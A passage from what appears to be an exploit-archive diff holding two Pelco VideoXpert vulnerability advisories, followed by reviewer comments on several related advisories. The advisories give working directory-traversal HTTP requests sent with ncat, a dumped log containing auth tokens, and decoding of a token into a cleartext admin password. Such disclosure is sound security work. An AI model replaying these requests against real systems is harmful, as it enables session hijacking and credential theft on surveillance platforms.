HTTP/1.1 +Host: 172.19.0.198 +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) +Connection: close + + +HTTP/1.1 200 OK +Date: Thu, 06 Apr 2017 11:59:07 GMT +Last-Modified: Wed, 05 Apr 2017 12:58:36 GMT +Cache-Control: public, max-age=86400 +Content-Type: text/html; charset=UTF-8 +ETag: 1491397116000 +Content-Length: 9 +Connection: close + +T0ps3cret + + +------ + + +bash-4.4$ cat pelco_system_ini.txt +GET /portal//..\\\..\\\..\\\..\\\windows\system.ini HTTP/1.1 +Host: 172.19.0.198 +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) +Connection: close + +bash-4.4$ ncat -v -n 172.19.0.198 80 < pelco_system_ini.txt +Ncat: Version 7.40 ( https://nmap.org/ncat ) +Ncat: Connected to 172.19.0.198:80. +HTTP/1.1 200 OK +Date: Thu, 06 Apr 2017 12:30:01 GMT +Last-Modified: Wed, 10 Jun 2009 21:08:04 GMT +Cache-Control: public, max-age=86400 +Content-Type: text/html; charset=UTF-8 +ETag: 1244668084000 +Content-Length: 219 +Connection: close + +; for 16-bit app support +[386Enh] +woafont=dosapp.fon +EGA80WOA.FON=EGA80WOA.FON +EGA40WOA.FON=EGA40WOA.FON +CGA80WOA.FON=CGA80WOA.FON +CGA40WOA.FON=CGA40WOA.FON + +[drivers] +wave=mmdrv.dll +timer=timer.drv + +[mci] +Ncat: 220 bytes sent, 460 bytes received in 0.03 seconds. +bash-4.4$ + diff --git a/platforms/windows/webapps/42312.txt b/platforms/windows/webapps/42312.txt new file mode 100755 index 000000000..70fc9c320 --- /dev/null +++ b/platforms/windows/webapps/42312.txt 
@@ -0,0 +1,81 @@ +Schneider Electric Pelco VideoXpert Missing Encryption Of Sensitive Information + + +Vendor: Schneider Electric SE +Product web page: https://www.pelco.com +Affected version: 2.0.41 + 1.14.7 + 1.12.105 + +Summary: VideoXpert is a video management solution designed for +scalability, fitting the needs surveillance operations of any size. +VideoXpert Ultimate can also aggregate other VideoXpert systems, +tying multiple video management systems into a single interface. + +Desc: The software transmits sensitive data using double Base64 encoding +for the Cookie 'auth_token' in a communication channel that can be +sniffed by unauthorized actors or arbitrarely be read from the vxcore +log file directly using directory traversal attack resulting in +authentication bypass / session hijacking. +Ref: ZSL-2017-5419 + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + Jetty(9.2.6.v20141205) + MongoDB/3.2.10 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5420 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5420.php + + +05.04.2017 + +-- + + +After a user logs in, the web server creates a Cookie: auth_token which has the following value: + +ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5 + +Base64 decoding that becomes: + +eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbjEyMyIsImRvbWFpbiI6IkxPQ0FMIiwiZXhwaXJlcyI6MTQ5MTU1Njc5NzE1OCwiYWdlbnQiOiI0MGY2NDM4Ni1mZmMwLTQ1NDEtOWNjZC1hNTIyM2RiMmZjMDkiLCJjbGllbnRJcCI6IjEyNy4wLjAuMSJ9 + +Again decoding, gives us result: + +{"username":"admin","password":"admin123","domain":"LOCAL","expires":1491556797158,"agent":"40f64386-ffc0-4541-9ccd-a5223db2fc09","clientIp":"127.0.0.1"} + + +PoC remote session takeover with directory 
traversal: +----------------------------------------------------- + +bash-4.4$ cat pelco_live.txt +GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\core\vxcore.log HTTP/1.1 +Host: 127.0.0.1 +Connection: close +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 +Content-Type: text/plain; charset=utf-8 +Accept: */* +Referer: https://127.0.0.1/portal/ +Accept-Language: en-US,en;q=0.8,mk;q=0.6 +DNT: 1 + +bash-4.4$ ncat -v -n 127.0.0.1 80 < pelco_live.txt > vxcore_log.txt +bash-4.4$ cat vxcore_log.txt +--snip-- +INFO [2017-04-06 11:20:09.999] [HealthCheckMonitorPollingThread-0] org.mongodb.driver.connection: Closed connection [connectionId{localValue:400, serverValue:473}] to mongod0-rs1-dfde27ce-6a4f-413a-a7c2-6df855d462df:31001 because the pool has been closed. +INFO [2017-04-06 11:20:12.559] [dw-5099 - GET /portal/System.html?auth_token=ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/System.html +INFO [2017-04-06 11:20:12.567] [dw-5055 - GET /portal/Lilac.css] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/Lilac.css +INFO [2017-04-06 11:20:12.568] [dw-5098 - GET /portal/lilac/lilac.nocache.js] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/lilac/lilac.nocache.js +--snip-- + +bash-4.4$ cat pelco_auth_token.txt 
+ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5 +bash-4.4$ base64 -D pelco_auth_token.txt |base64 -D - +{"username":"admin","password":"admin123","domain":"LOCAL","expires":1491556797158,"agent":"40f64386-ffc0-4541-9ccd-a5223db2fc09","clientIp":"127.0.0.1"} +bash-4.4$ +
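Review bot: the '3. Solution' section of 42314.txt names no fixed release. The header gives 'AlienVault USM/OSSIM < 4.3.1' as affected, which implies 4.3.1 as the fix for that product, but for NfSen it lists 1.3.6p1, 1.3.7 and 1.3.7-1~bpo80+1_all with 'Previous versions are also likely to be affected' and then says only 'Update to latest version'; state the NfSen release that addresses CVE-2017-7175 and CVE-2017-6972, or link the vendor advisory, so a defender can check a deployment. The Description pairs the two CVEs ('the injection is covered by CVE-2017-7175, and the commands are executed as root due to CVE-2017-6972') without saying which component runs with root privileges; one sentence on that, plus a mitigation that does not depend on upgrading (running that component under an unprivileged account, restricting who can reach the web UI), would make the advisory actionable. The address 10.100.1.2 in the PoC should be marked as an example value.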
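Review bot: 42315.py imports 'MYSMB' from 'mysmb' ('from mysmb import MYSMB'), but no mysmb.py is added anywhere in this commit and the header does not say where it comes from; add the dependency, or a comment with its source, next to 'from impacket import smb, smbconnection', otherwise the script fails at import time. In the reversed-structure docstring the win2012 x64 layout reuses field names ('xx3' and 'xx4' each appear twice), which makes the offsets ambiguous when read against the win7 layout; give each padding field a unique name. The docstring spells PsImpersonateClient as 'PsImperonateClient' in three places, which defeats searching against the MSDN page it links. USERNAME and PASSWORD are empty module-level constants with no comment; document what the script expects when they are left empty. Finally, 'The exploit should never crash a target (chance should be nearly 0%)' reads as a guarantee; either cite what the estimate is based on or soften it.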
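Review bot: the second request in 42311.txt (GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\db\security\key.pem) returns a 9-byte body 'T0ps3cret', which is not PEM-encoded data, so either the file was replaced for the demonstration or the response is not what the path suggests; say which, or a reader will assume the key is stored in that form. The advisory lacks a fix or mitigation section: three affected versions (2.0.41, 1.14.7, 1.12.105) are listed with no fixed version, leaving defenders nothing to check against. Also worth flagging from the shown responses: every traversed file comes back with 'Content-Type: text/html; charset=UTF-8' and 'Cache-Control: public, max-age=86400', so the contents of files fetched this way are marked as publicly cacheable by intermediaries. For detection, the '/portal//..\\\' prefix with backslash sequences is a distinctive string to look for in the Jetty access logs of the 'Tested on' configuration.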
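Review bot: the Desc in 42312.txt folds two distinct weaknesses into 'missing encryption': (1) the auth_token cookie is a double-Base64 encoding of a JSON object that carries the cleartext password ('"password":"admin123"'), so whoever obtains the token also obtains the credential, and (2) vxcore.log records the full request line including 'GET /portal/System.html?auth_token=...', so the token is reachable through the traversal in ZSL-2017-5419. Separate them, because the fixes differ: the token should be an opaque server-side session identifier carrying no credentials, and the server should neither accept the token in a query string nor log it. The 'expires' value (1491556797158, a millisecond epoch) is a claim inside the token rather than server-side state, so the advisory should say whether the server enforces it. The PoC's 'base64 -D' is the macOS flag (GNU coreutils uses '-d'), worth a note since the prompt is 'bash-4.4$'. No fixed version is given for the affected versions 2.0.41, 1.14.7 and 1.12.105.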